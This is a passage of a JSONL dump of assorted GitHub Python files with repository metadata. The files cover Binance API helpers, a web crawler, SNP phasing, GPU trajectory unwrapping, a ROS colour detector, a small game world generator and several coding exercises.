binance.rest_api import generate_post_request\n\n\ndef cancel_order_binance(key, pair_name, order_id):\n\n body = {\n \"recvWindow\": 5000,\n \"timestamp\": get_now_seconds_utc_ms(),\n \"symbol\": pair_name,\n \"orderId\": order_id\n }\n\n post_details = generate_post_request(BINANCE_CANCEL_ORDER, body, key)\n\n if get_logging_level() >= LOG_ALL_MARKET_RELATED_CRAP:\n msg = \"cancel_order_binance: url - {url} headers - {headers} body - {body}\".format(\n url=post_details.final_url, headers=post_details.headers, body=post_details.body)\n print_to_console(msg, LOG_ALL_MARKET_RELATED_CRAP)\n log_to_file(msg, \"market_utils.log\")\n\n err_msg = \"cancel binance order with id {id}\".format(id=order_id)\n\n res = send_delete_request_with_header(post_details, err_msg, max_tries=3)\n\n if get_logging_level() >= LOG_ALL_MARKET_RELATED_CRAP:\n print_to_console(res, LOG_ALL_MARKET_RELATED_CRAP)\n log_to_file(res, \"market_utils.log\")\n\n return res\n\n\ndef parse_order_id_binance(json_document):\n \"\"\"\n {u'orderId': 6599290,\n u'clientOrderId': u'oGDxv6VeLXRdvUA8PiK8KR',\n u'origQty': u'27.79000000',\n u'symbol': u'OMGBTC',\n u'side': u'SELL',\n u'timeInForce': u'GTC',\n u'status': u'FILLED',\n u'transactTime': 1514223327566,\n u'type': u'LIMIT',\n u'price': u'0.00111100',\n u'executedQty': u'27.79000000'}\n \"\"\"\n\n if is_error(json_document):\n\n msg = \"parse_order_id_binance - error response - {er}\".format(er=json_document)\n log_to_file(msg, ERROR_LOG_FILE_NAME)\n\n return None\n\n if \"orderId\" in json_document:\n return json_document[\"orderId\"]\n\n return None\n\n\ndef get_trades_history_binance(key, pair_name, limit, last_order_id=None):\n final_url = BINANCE_GET_ALL_TRADES\n\n body = []\n\n if last_order_id is not None:\n body.append((\"fromId\", last_order_id))\n\n body.append((\"symbol\", pair_name))\n body.append((\"limit\", limit))\n body.append((\"timestamp\", get_now_seconds_utc_ms()))\n body.append((\"recvWindow\", 5000))\n body.append((\"signature\", signed_body_256(body, key.secret)))\n\n post_details = generate_post_request(final_url, body, key)\n\n if get_logging_level() >= LOG_ALL_DEBUG:\n msg = \"get_trades_history_binance: {res}\".format(res=post_details)\n print_to_console(msg, LOG_ALL_DEBUG)\n log_to_file(msg, DEBUG_LOG_FILE_NAME)\n\n err_msg = \"get_all_trades_binance for {pair_name}\".format(pair_name=pair_name)\n\n error_code, res = send_get_request_with_header(post_details.final_url, post_details.headers, err_msg,\n timeout=BINANCE_DEAL_TIMEOUT)\n\n if get_logging_level() >= LOG_ALL_DEBUG:\n msg = \"get_all_trades_binance: {er_c} {r}\".format(er_c=error_code, r=res)\n print_to_console(msg, LOG_ALL_DEBUG)\n log_to_file(msg, DEBUG_LOG_FILE_NAME)\n\n return error_code, res\n","repo_name":"kruglov-dmitry/crypto_crawler","sub_path":"binance/market_utils.py","file_name":"market_utils.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"75"} +{"seq_id":"12622063064","text":"from framework.wsgi import Framework\nfrom framework.view import (HomeView, AboutView, CategoriesView,\n CategoryEdit, CourseEdit, CourseView)\nfrom framework.url import Url\n\n# noinspection PyTypeChecker\nurls = [\n Url('/', HomeView),\n Url('/about', AboutView),\n Url('/categories', CategoriesView),\n Url('/category_edit', CategoryEdit),\n Url('/course', CourseView),\n Url('/course_edit', CourseEdit),\n]\n\napp = Framework(urls)","repo_name":"Tititun/architecture","sub_path":"lesson_4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"46868178682","text":"# Question Link - https://leetcode.com/problems/find-missing-observations/\n\n# Solution - \n\nclass Solution:\n def missingRolls(self, rolls: List[int], mean: int, n: int) -> List[int]:\n m = len(rolls)\n total_sum = mean*(m+n)\n required_sum = total_sum - sum(rolls)\n if required_sum < n or required_sum > 6*n:\n return []\n each = required_sum // n\n ans = [each for i in range(n)]\n rem = required_sum - each*n\n i = 0\n while rem:\n ans[i] += 1\n i += 1\n rem -= 1\n return ans\n","repo_name":"codethat-vivek/Code","sub_path":"LeetCode/Find Missing Observations.py","file_name":"Find Missing Observations.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13523140436","text":"import url_manager\nimport html_downloader\nimport html_parser\nimport html_outputer\n\n\n# 爬虫总调度程序,执行函数\nclass SpiderMain(object):\n # 爬虫总调度程序会使用 url 管理器, html 的下载器,解析器,输出器,下面初始化一下:\n def __init__(self):\n self.urls = url_manager.UrlManager()\n self.downloader = html_downloader.HtmlDownloader()\n self.parser = html_parser.HtmlParser()\n self.outputer = html_outputer.HtmlOutputer()\n\n def craw(self, root_url):# craw 方法,爬虫调度程序\n count = 1\n # 入口 url 添加到 url 管理器\n self.urls.add_new_url(root_url)\n # 启动爬虫循环\n while self.urls.has_new_url():\n try:\n # 当 url 管理器里待爬取的 url 时,获取一个\n new_url = self.urls.get_new_url()\n print('craw %d : %s' %(count, new_url))# 打印传入的第几个 url\n # 启动下载器并存储\n html_cont = self.downloader.download(new_url)\n # 解析数据\n new_urls, new_data = self.parser.parse(new_url, html_cont)\n # 添加进 url 管理器\n self.urls.add_new_urls(new_urls)\n # 收集数据\n self.outputer.collect_data(new_data)\n # 为防止爬虫程序突然崩溃,每100个就写入一次保存\n if count % 100 == 0:\n self.outputer.output_html()\n # 你可以设置的最大爬取上线\n if count == 1000:\n break\n\n count += 1\n except Exception as e:\n print('crew failed:', e)\n # 输出收集好的数据\n self.outputer.output_html()\n\nif __name__==\"__main__\":\n root_url = \"http://baike.baidu.com/item/Python\" # 这里写上最开始的页面url\n obj_spider = SpiderMain()\n obj_spider.craw(root_url) # 启动爬虫","repo_name":"zxc479773533/A-python-spider","sub_path":"spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70523299764","text":"import os\nimport pandas as pd\nmaster_df = pd.DataFrame()\nf1 = pd.read_csv('patient-characteristics-survey-pcs-2013-1.csv')\nf2 = pd.read_csv('patient-characteristics-survey-pcs-2017-1.csv')\nmaster_df = master_df.append(f1)\nmaster_df = master_df.append(f2)\nmaster_df.to_csv('Data_Tuto_2013_2017.csv', index=False)\n\n# Path: merge csv files .py\n","repo_name":"sakkovic/Stroke-Detection-and-outcome-prediction","sub_path":"Stroke Prediction/merge csv files .py","file_name":"merge csv files .py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3659763085","text":"import argparse\n\nimport torch\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--text', help='checkpoint file')\n parser.add_argument('--image', help='checkpoint file')\n parser.add_argument('--video', help='checkpoint file')\n parser.add_argument('--audio', help='checkpoint file')\n parser.add_argument('--out', help='checkpoint file')\n parser.add_argument('--no_keep_head', default=False, action='store_true')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n text_ckpt = torch.load(args.text)\n image_ckpt = torch.load(args.image)\n video_ckpt = torch.load(args.video)\n audio_ckpt = torch.load(args.audio)\n if 'state_dict' in text_ckpt.keys():\n text_ckpt = text_ckpt['state_dict']\n if 'state_dict' in image_ckpt.keys():\n image_ckpt = image_ckpt['state_dict']\n if 'state_dict' in video_ckpt.keys():\n video_ckpt = video_ckpt['state_dict']\n if 'state_dict' in audio_ckpt.keys():\n audio_ckpt = audio_ckpt['state_dict']\n ret = {}\n for typ, dic in zip(['text', 'image', 'video', 'audio'],\n [text_ckpt, image_ckpt, video_ckpt, audio_ckpt]):\n for key, val in dic.items():\n ret[typ + '_branch.' + key] = val\n # if key.startswith(typ) and (not args.no_keep_head\n # or 'head' not in key):\n # ret[key] = val\n torch.save(ret, args.out)\n print(f'Saved as {args.out}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Chrisfsj2051/Multi-Modal-Tagging","sub_path":"src/utils/tools/publish_model/merge_branch.py","file_name":"merge_branch.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40972607747","text":"pares = []\r\ncount = 1\r\n\r\nrodar = True\r\n\r\nwhile rodar:\r\n if count == 6:\r\n rodar = False\r\n x = int(input('Digite um numero par: '))\r\n \r\n if x % 2 == 0:\r\n pares.append(x)\r\n count+=1\r\n\r\nprint('Numeros pares lidos na ordem inversa: ', *pares[::-1])\r\n","repo_name":"CleitonSilvaPaes/geek_university_exercicio","sub_path":"Secao07/09.py","file_name":"09.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20898945432","text":"import sys\nimport copy\nimport pysam\nimport bisect\n\n# parameters\nminNumOfSperm = 2\nnumOfPhased = 5 # on each side to search\nsnpFold = 4 # >80% of nearby phased SNPs of each sperm must agree\nspermFold = 3 # >75% of voted sperm must agree\n\n# read IO locations from arguments\ninputVcfFile = sys.argv[1]\ninputDraftFile = open(sys.argv[2],\"r\")\nchrName = sys.argv[3]\n\nnumOfSperm=99\nchildId=numOfSperm+1\nfatherId=numOfSperm+0\nmotherId=numOfSperm+2\n\n# load already phased SNPs\nsys.stderr.write('reading phased SNPs\\n')\nphasedData = {}\nfor inputDraftLine in inputDraftFile:\n inputDraftLineData = inputDraftLine.strip().split()\n if inputDraftLineData[0][3:] != chrName: # assuming phased file has \"chr1\" style naming\n continue\n phasedData[int(inputDraftLineData[1])] = [inputDraftLineData[2],inputDraftLineData[3]]\n\n# open VCF file\nbcf_in = pysam.VariantFile(inputVcfFile)\nvcfSamples = bcf_in.header.samples\nchildSample = vcfSamples[childId]\nfatherSample = vcfSamples[fatherId]\nmotherSample = vcfSamples[motherId]\nspermSamples = []\nfor spermId in range(numOfSperm):\n spermSamples.append(vcfSamples[spermId])\n \n# build draft haplotypes based on phased SNPs\nsys.stderr.write('using phased SNPs to determine sperm haplotypes\\n')\ndraftLoci = []\ndraftHaplotypes = []\nfor rec in bcf_in.fetch():\n if rec.pos not in phasedData:\n continue # only use phased SNPs\n phasedNucleotides = phasedData[rec.pos]\n phasedHaplotype = []\n for spermSample in spermSamples:\n spermHaplotype = -1 # unknown\n if rec.samples[spermSample][\"GT\"][0] != None:\n spermNucleotide = rec.alleles[rec.samples[spermSample][\"GT\"][0]]\n if spermNucleotide == phasedNucleotides[0]:\n spermHaplotype = 0\n elif spermNucleotide == phasedNucleotides[1]:\n spermHaplotype = 1\n phasedHaplotype.append(spermHaplotype)\n draftLoci.append(rec.pos)\n draftHaplotypes.append(phasedHaplotype)\n #print rec.pos, phasedHaplotype\ndraftLoci, draftHaplotypes = zip(*sorted(zip(draftLoci, draftHaplotypes)))\n\n# start phasing\nphasingCounter = 0\nsys.stderr.write('using sperm haplotypes to phase unknown SNPs\\n')\nfor rec in bcf_in.fetch():\n childGenotype = rec.samples[childSample][\"GT\"]\n #fatherGenotype = rec.samples[fatherSample][\"GT\"]\n #motherGenotype = rec.samples[motherSample][\"GT\"]\n vcfAlleles = rec.alleles\n spermGenotypes = []\n if childGenotype[0] == childGenotype[1]:\n continue # only use het\n if rec.pos in phasedData:\n continue # only study unknown\n leftGenotype = childGenotype[0]\n rightGenotype = childGenotype[1]\n spermVotes = [0, 0] # left=pat vs. left=mat\n for spermId in range(numOfSperm):\n spermGenotype = rec.samples[spermSamples[spermId]][\"GT\"][0]\n if spermGenotype == leftGenotype:\n spermSide = 0\n elif spermGenotype == rightGenotype:\n spermSide = 1\n else:\n continue\n siteVotes = [0, 0]\n posId = bisect.bisect_left(draftLoci, rec.pos)\n\n counter = 0\n for i in range(posId-1, 0, -1):\n if draftHaplotypes[i][spermId] < 0:\n continue\n if draftHaplotypes[i][spermId] == spermSide:\n siteVotes[0] += 1\n else:\n siteVotes[1] += 1\n counter += 1\n if counter >= numOfPhased:\n break\n\n counter = 0\n for i in range(posId, len(draftLoci), 1):\n if draftHaplotypes[i][spermId] < 0:\n continue\n if draftHaplotypes[i][spermId] == spermSide:\n siteVotes[0] += 1\n else:\n siteVotes[1] += 1\n counter += 1\n if counter >= numOfPhased:\n break\n\n if siteVotes[0] > snpFold * siteVotes[1]: # > 80% of SNPs agree on a haplotype\n spermVotes[0] += 1\n elif siteVotes[1] > snpFold * siteVotes[0]:\n spermVotes[1] += 1\n if spermVotes[0] + spermVotes[1] < minNumOfSperm: # needs at least two sperms cover\n continue\n if spermVotes[0] > spermFold * spermVotes[1]: # needs > 3x majority vote\n phasingCounter += 1\n sys.stdout.write(chrName+'\\t'+str(rec.pos)+'\\t'+vcfAlleles[leftGenotype]+'\\t'+vcfAlleles[rightGenotype]+'\\n')\n if phasingCounter % 1000 == 0:\n sys.stderr.write('phased '+str(phasingCounter)+' SNPs\\n')\n elif spermVotes[1] > spermFold * spermVotes[0]: # needs > 3x majority vote\n phasingCounter += 1\n sys.stdout.write(chrName+'\\t'+str(rec.pos)+'\\t'+vcfAlleles[rightGenotype]+'\\t'+vcfAlleles[leftGenotype]+'\\n')\n if phasingCounter % 1000 == 0:\n sys.stderr.write('phased '+str(phasingCounter)+' SNPs\\n')","repo_name":"tanlongzhi/dip-c","sub_path":"legacy/phase_sperm.py","file_name":"phase_sperm.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"75"} +{"seq_id":"4446875991","text":"import numpy as np\nfrom itertools import cycle, accumulate\n\n\ndef part1(filename):\n with open(filename) as f:\n data = f.readlines()\n\n data = np.asarray(list(map(int, data)))\n print(data.sum())\n\n\ndef part2(filename):\n with open(filename) as f:\n data = f.readlines()\n data = list(map(int, data))\n\n # freq = 0\n # freq_list = [0, ]\n # ptr = 0\n # while True:\n # freq = freq + data[ptr]\n # if freq in freq_list:\n # print(\"Repeated frequency:\", freq)\n # # break\n # exit(0)\n # else:\n # freq_list.append(freq)\n\n # ptr = (ptr + 1) % len(data)\n # # print(ptr, freq)\n\n # this is a faster solution using optimized itertools\n seen = set()\n print(next(f for f in accumulate(cycle(data)) if f in seen or seen.add(f)))\n\n\npart1(\"day1_1.txt\")\npart2(\"day1_1.txt\")\n","repo_name":"varunagrawal/advent-of-code","sub_path":"2018/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19109484801","text":"import random\r\nimport math\r\nimport sqlite3\r\nimport database as Database\r\nimport player as Player\r\nimport background as Background\r\n\r\nENTITY_TYPE_PLAYER = 1\r\n\r\nBACKGROUND_TYPE_ERROR = 0\r\nBACKGROUND_TYPE_DIRT = 1\r\nBACKGROUND_TYPE_GRASS = 2\r\n\r\ndef Init():\r\n\tglobal map, obj_seed\r\n\tmap={}\r\n\tobj_seed = Database.LoadWorldSeed()\r\n\tif not obj_seed:\r\n\t\tobj_seed = GenerateSeed()\r\n\tLoadWorldAroundPostition(Player.GetAbsoluteCoords())\r\n\tDatabase.Commit()\r\n\r\n#\tprint(map[128][128])\r\n\r\ndef LoadWorldAroundPostition(coords, radius = 100):\r\n\tfor x in range (coords[0]-radius, coords[0]+radius):\r\n\t\tfor y in range (coords[1]-radius, coords[1]+radius):\r\n\t\t\tLoadWorld((x,y))\r\n\r\n\r\ndef PostInit(background):\r\n\tglobal background_block_x, background_block_y, background_block_x_center, background_block_y_center\r\n\tbackground_block_x = background[0]\r\n\tbackground_block_y = background[1]\r\n\tbackground_block_x_center = background_block_x//2\r\n\tbackground_block_y_center = background_block_y//2\r\n\r\ndef CalcChunk(player_coords_float, direction):\r\n\tglobal background_block_x, background_block_y, background_block_x_center, background_block_y_center\r\n\tplayer_coords = (math.trunc(player_coords_float[0]), math.trunc(player_coords_float[1]))\r\n\tif direction == \"north\":\r\n\t\tfor x in range (player_coords[0]-background_block_x_center-2, player_coords[0]+background_block_x_center+2):\r\n\t\t\tpos = str(x)+':'+str(player_coords[1]-background_block_y_center-1)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((x, player_coords[1]-background_block_y_center-1))\r\n\telif direction == \"south\":\r\n\t\tfor x in range (player_coords[0]-background_block_x_center-2, player_coords[0]+background_block_x_center+2):\r\n\t\t\tpos = str(x)+':'+str(player_coords[1]+background_block_y_center+1)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((x, player_coords[1]+background_block_y_center+1))\r\n\t\t\t#print(pos)\r\n\telif direction == \"east\":\r\n\t\tfor y in range (player_coords[1]-background_block_y_center-2, player_coords[1]+background_block_y_center+2):\r\n\t\t\tpos = str(player_coords[0]+background_block_x_center+1)+':'+str(y)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((player_coords[0]+background_block_x_center+1, y))\r\n\telif direction == \"west\":\r\n\t\tfor y in range (player_coords[1]-background_block_y_center-2, player_coords[1]+background_block_y_center+2):\r\n\t\t\tpos = str(player_coords[0]-background_block_x_center-1)+':'+str(y)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((player_coords[0]-background_block_x_center-1, y))\r\n\r\ndef GetElement(coords):\r\n\tglobal map\r\n\tpos = str(coords[0])+':'+str(coords[1])\r\n\tif not pos in map.keys():\r\n\t\t#print(\"Erreur à la position:\", pos)\r\n\t\treturn 0\r\n\telse:\r\n\t\treturn map[pos]\r\n\r\ndef LoadWorld(coords):\r\n\telement = Database.GetElement(coords)\r\n\tif element != None:\r\n\t\tmap[str(coords[0])+':'+str(coords[1])] = element\r\n\telse:\r\n\t\tGenerateWorld(coords)\r\n\r\ndef DeleteWorld():\r\n\tglobal map, rando1, rando2\r\n\tDatabase.DeleteWorldData()\r\n\tInit()\r\n\tBackground.CalcPositions()\r\n\r\ndef GenerateSeed(type = \"sinusoid\"):\r\n\tobj_seed = {\r\n\t\t\"type\" : \"sinusoid\",\r\n\t\t\"number\" : random.randint(1, 4),\r\n\t\t\"random\" : []\r\n\t}\r\n\r\n\tif type == \"sinusoid\":\r\n\t\tfor loop in range (obj_seed[\"number\"]):\r\n\t\t\tobj_seed[\"random\"].append(0.5+random.random()*random.randint(3, 20))\r\n\t\tDatabase.SaveWorldSeed(obj_seed)\r\n\t\treturn obj_seed\r\n\r\n\r\ndef GenerateWorld(coords):\r\n\tglobal map\r\n\tdistance_init = math.sqrt((coords[0])**2+(coords[1])**2)\r\n\tdistance = 0\r\n\tfor loop in range (obj_seed[\"number\"]):\r\n\t\tdistance += math.cos(obj_seed[\"random\"][loop]*distance_init)\r\n\r\n\tif distance >= 0:\r\n\t\telement = 1\r\n\telse:\r\n\t\telement = 2\r\n\r\n#\telement = random.randint(0,1)\r\n\tmap[str(coords[0])+':'+str(coords[1])] = element\r\n\tDatabase.AddElementToMap((coords[0], coords[1], element))\r\n","repo_name":"antoinech2/Factinfinity","sub_path":"id1.1.8/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"46238769635","text":"#utils that unwrap and smooth trajectories on the gpu\n#Programmer: Tim Tyree\n#Date: 9.29.2021\nimport numpy as np, cupy as cp, numba.cuda as cuda, cudf#, pandas as pd\n\ndef unwrapper_pbc(incol, outcol, jump_thresh, width):\n '''\n Example Usage: for cudf.DataFrame instance\n df['incol']=df['x']\n grouped = df.groupby(pid_col)\n df = grouped.apply_grouped(unwrapper_pbc,\n incols=['incol'],\n outcols=dict(outcol=np.float64), jump_thresh=width/2)\n df['dx_unwrap']=df['outcol']\n df.head()\n '''\n e=incol\n de_unwrap=outcol\n for i in range(cuda.threadIdx.x, len(e), cuda.blockDim.x):\n de_unwrap[i]=0\n if i>0:\n de=e[i]-e[i-1]\n jump_plus=de<-jump_thresh\n jump_minus=de>jump_thresh\n if jump_plus:\n de_unwrap[i]=width\n elif jump_minus:\n de_unwrap[i]=-width\n\ndef rolling_avg(incol, outcol, win_size):\n e=incol\n rolling_avg_e=outcol\n for i in range(cuda.threadIdx.x, len(e), cuda.blockDim.x):\n if i < win_size - 1:\n # if there is not enough data to fill the window, take the average to be nan\n rolling_avg_e[i] = np.nan\n else:\n total = 0\n for j in range(i - win_size + 1, i + 1):\n total += e[j]\n rolling_avg_e[i] = total / win_size\n\ndef rolling_diff(incol, outcol, win_size=2):\n e=incol\n rolling_diff_e=outcol\n for i in range(cuda.threadIdx.x, len(e), cuda.blockDim.x):\n if i < win_size - 1:\n # if there is not enough data to fill the window, take the average to be nan\n rolling_diff_e[i] = np.nan\n else:\n j=i - win_size + 1\n rolling_diff_e[i] = e[i]-e[j]\n\ndef apply_unwrap_xy_trajectories_pbc(df,t_col,pid_col,width,height,**kwargs):\n #now we only have good data... we can compute moving averages for each particle!\n #allocate memory\n df['dx_unwrap']=0.*df['x']\n df['dy_unwrap']=0.*df['y']\n df['x_unwrap']=df['x']\n df['y_unwrap']=df['y']\n #TODO(optional): reset the index... not needed and ruins reconstruction of dropped columns at the end... don't do it...\n # df.reset_index(inplace=True)\n #apply unwrapping to x and y\n df['incol']=df['x']\n grouped = df.groupby(pid_col)\n uwargs={'jump_thresh':width/2,\"width\":width}\n df = grouped.apply_grouped(unwrapper_pbc,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n uwargs)\n df['dx_unwrap']=df['outcol']\n\n df['incol']=df['y']\n grouped = df.groupby(pid_col)\n uwargs={'jump_thresh':height/2,\"width\":height}\n df = grouped.apply_grouped(unwrapper_pbc,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n uwargs)\n df['dy_unwrap']=df['outcol']\n\n df.drop(columns=['incol','outcol'],inplace=True)\n\n #DONE: confirmed ^that was nontrivial and reasonable looking\n # (df['dx_unwrap']!=0).any(),(df['dy_unwrap']!=0).any()\n # df[df['dx_unwrap']!=0].head()\n # (True,True)\n\n #aggregte over jumps\n grouped_unwrap=df.groupby(pid_col)\n\n #aggregate along a given columns in grouped_unwrap\n result=grouped_unwrap[['dx_unwrap','dy_unwrap']].cumsum()\n\n #map result back onto df using reindexing ninjitsu\n cp_col_lst=['dx_unwrap','dy_unwrap']\n df.reset_index(inplace=True)\n result.reset_index(inplace=True)\n for col in cp_col_lst:\n df[col]=result[col]\n df.set_index('index',inplace=True)\n\n #compute unwrapped coordinates\n df['x_unwrap']=df['x']+df['dx_unwrap']\n df['y_unwrap']=df['y']+df['dy_unwrap']\n return df\n\ndef apply_moving_avg_xy_trajectories(df,t_col,pid_col,navg1,x_col='x_unwrap',y_col='y_unwrap',**kwargs):\n diffx_col='diff'+x_col\n diffy_col='diff'+y_col\n #apply smoothing to x and y after unwrapping\n df['incol']=df[x_col]\n grouped = df.groupby(pid_col)\n if navg1>0:\n mawargs={'win_size':navg1}\n df = grouped.apply_grouped(rolling_avg,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mawargs)\n df[x_col]=df['outcol']\n\n df['incol']=df[y_col]\n grouped = df.groupby(pid_col)\n df = grouped.apply_grouped(rolling_avg,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mawargs)\n df[y_col]=df['outcol']\n # else:\n # #perform no moving average if the window is of size zero\n # pass\n # #drop data that isn't needed anymore\n #DONE: verified that dropping data here doesn't affect the number of final nonnan values\n # df.drop(columns=['incol','outcol'],inplace=True)\n df.dropna(inplace=True)\n # df.head()\n\n #apply smoothing to x and y after unwrapping\n df['incol']=df[x_col]\n grouped = df.groupby(pid_col)\n mdwargs={'win_size':2}\n df = grouped.apply_grouped(rolling_diff,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mdwargs)\n df[diffx_col]=df['outcol']\n\n df['incol']=df[y_col]\n grouped = df.groupby(pid_col)\n df = grouped.apply_grouped(rolling_diff,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mdwargs)\n df[diffy_col]=df['outcol']\n\n #drop data that isn't needed anymore\n df.drop(columns=['incol','outcol'],inplace=True)\n # df.dropna(inplace=True)\n\n #compute the naive speed of the unwrapped trajectories in pixels per frame\n df['speed']=cp.sqrt(df[diffx_col]**2+df[diffy_col]**2)#pixels per frame\n # df['speed']=cp.sqrt(df['diffx_unwrap']**2+df['diffy_unwrap']**2)#pixels per frame#*DS/DT*10**3 #cm/s\n\n # #DONE: test and verify that the largest stepsize in the unwrapped xy is reasonable for both x and y\n # max_speed_values=df.groupby(pid_col)['speed'].max().values\n # plt.hist(max_speed_values.get(),bins=30)\n # plt.xlabel('max pixel displacement between two frames')\n # max_speed_warning=20 #pixels per frame\n # assert ((max_speed_values.get()mid:\n l[k] = ll[j]\n j += 1\n elif j>high:\n l[k] = ll[i]\n i += 1\n elif ll[i] max_area:\n max_area = area\n max_contour = contour\n \n if max_contour is not None:\n x, y, w, h = cv2.boundingRect(max_contour)\n cx = x + w/2\n cy = y + h/2\n \n green_point = Point()\n green_point.x = cx\n green_point.y = cy\n green_point.z = 0\n \n self.coord_pub.publish(green_point)\n \n # Dibujar contorno en la imagen original\n cv2.rectangle(cv_image, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n # Mostrar imagen\n cv2.imshow(\"Green Object Detector\", cv_image)\n cv2.waitKey(1)\n\nif __name__ == '__main__':\n rospy.init_node('green_object_detector', anonymous=True)\n green_detector = GreenObjectDetector()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n pass\n cv2.destroyAllWindows()\n","repo_name":"fercuellar/Interfaces","sub_path":"image_detector/green_detector.py","file_name":"green_detector.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39740784198","text":"import logging\nimport time\nimport threading\n\n\nclass ResultWorker:\n _instance = None\n _resultClass = None\n _resultSenderObjectId = 0\n _resultObject = None\n _condition = threading.Condition()\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super().__new__(cls, *args, **kwargs)\n return cls._instance\n\n def _setResultInfo(self, resultClass, resultSenderObjectId:int):\n '''print(\"resultInfo \" + str(resultClass) + \", ID \" + str(resultSenderObjectId))'''\n self._resultClass = resultClass\n self._resultSenderObjectId = resultSenderObjectId\n self._resultObject=None\n\n def waitForResult(self, timeoutInSeconds:int):\n start_time = time.time()\n end_time = start_time + timeoutInSeconds\n\n with self._condition:\n while self._resultObject == None and time.time() < end_time:\n self._condition.wait(1)\n\n return self._resultObject\n\n def waitForEvent(self, event, eventSenderObjectId, timeoutInSeconds:int):\n self._resultClass = event\n self._resultSenderObjectId = eventSenderObjectId\n self._resultObject=None\n \n start_time = time.time()\n end_time = start_time + timeoutInSeconds\n\n with self._condition:\n while self._resultObject == None and time.time() < end_time:\n self._condition.wait(1)\n\n return self._resultObject\n\n def busDataReceived(self, busDataMessage):\n '''print(\"got \"+str(busDataMessage))'''\n if (self._resultClass != None and busDataMessage.getSenderObjectId()==self._resultSenderObjectId and isinstance(busDataMessage.getData(), self._resultClass)):\n with self._condition:\n self._resultObject = busDataMessage.getData()\n self._condition.notify()\n","repo_name":"hausbus/homeassistant","sub_path":"pyhausbus/ResultWorker.py","file_name":"ResultWorker.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8221322442","text":"#!/usr/bin/env python3\nimport os, datetime\nimport sqlite3 as lite\nfrom optparse import OptionParser\nfrom datetime import datetime\n\n# Initialise where database file is stored (in .bashrc)\nDB_FILE = os.environ['DB_FILE']\n\n# Information required to update database\nparser = OptionParser()\nparser.add_option(\"-o\", \"--obsid\", dest=\"obsid\", default=None, type=int, help=\"Observation's ID\")\nparser.add_option(\"-s\", \"--status\", dest=\"status\", default=\"Failed\", type=str, help=\"Status of observation in the pipeline (eg. completed, failed, etc.)\")\n\nopts, args = parser.parse_args()\n\n# At least the observation that is to be updated needs to be known\nif opts.obsid is None:\n parser.error(\"Obsid must be set\")\n\n# Time when processing of the observation has finished\nend_time = datetime.now()\n\nobsid=int(opts.obsid)\n\ncon = lite.connect(DB_FILE)\nwith con:\n cur = con.cursor()\n if opts.status == \"Failed\":\n cur.execute(\"UPDATE Log SET Ended=?, Status=? WHERE Obsid=?\", (end_time, opts.status, obsid))\n else:\n query = \"SELECT Started FROM Log WHERE Obsid=%d\" % (obsid)\n #cur.execute(\"SELECT Started FROM Log WHERE Obsid=?\", (opts.obsid))\n cur.execute(query)\n start_time = cur.fetchone()[0]\n start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S.%f')\n time_diff = end_time - start_time\n diff = time_diff.total_seconds()\n cur.execute(\"UPDATE Log SET Ended=?, Time=?, Status=? WHERE Obsid=?\", (end_time, diff, opts.status, obsid))\n","repo_name":"johnsmorgan/asvo_bash_pipeline","sub_path":"db/db_end_log.py","file_name":"db_end_log.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6584944409","text":"import os\nimport wget\n\nURL_TRAIN = 'https://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-training-true.data'\nURL_TEST = 'https://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-testing.data'\n\n\ndef main():\n\n if not os.path.exists('./data'):\n os.makedirs('./data')\n\n # We only demonstrate training for optimized hyperparameters here,\n # without validation.\n\n wget.download(URL_TRAIN, 